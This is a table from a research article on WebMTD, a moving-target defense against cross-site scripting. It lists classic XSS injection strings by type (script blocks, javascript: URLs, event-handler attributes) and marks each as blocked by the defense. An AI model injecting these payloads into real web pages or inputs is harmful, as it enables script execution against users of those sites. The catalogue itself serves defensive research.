Research Article
WebMTD: Defeating Cross-Site Scripting Attacks Using Moving Target Defense
Table 2
Types of XSS exploit codes and examples.
| Type | Sub-type | Example codes | Defense |
|---|---|---|---|
| Script block | External | `<script src=http://.../XSS.js></script>` | Viable on all browsers. Blocked by WebMTD |
| Script block | Inline | `<script>alert('XSS')</script>` | Viable on all browsers. Blocked by WebMTD |
| Inline script code | Elements w/ javascript: URL as source | `<img src=javascript:alert(XSS);>` | Now, only viable for iframe. Blocked by WebMTD |
| | | `<img src=javascript:alert(String.fromCharCode(88,83,83))>` | |
| | | `<div style=background-image: url(javascript:alert(XSS))>` | |
| | | `<bgsound src=javascript:alert(XSS);>` | |
| | | `<link rel=stylesheet href=javascript:alert(XSS);>` | |
| | | ... | |
| | | `<IFRAME SRC=javascript:alert(XSS);></IFRAME>` | |
| Inline script code | Elements w/ event attributes | `<img src=# onmouseover=alert(XSS)>` | Viable on all browsers. Blocked by WebMTD |
| | | `<img src= onmouseover=alert(XSS)>` | |
| | | `<img onmouseover=alert(XSS)>` | |
| | | `<img src=/ onerror=alert(String.fromCharCode(88,83,83))></img>` | |
| | | `<body onload=alert(XSS)>` | |
| | | `<img src=/ onrror=alert(XSSd)>` | |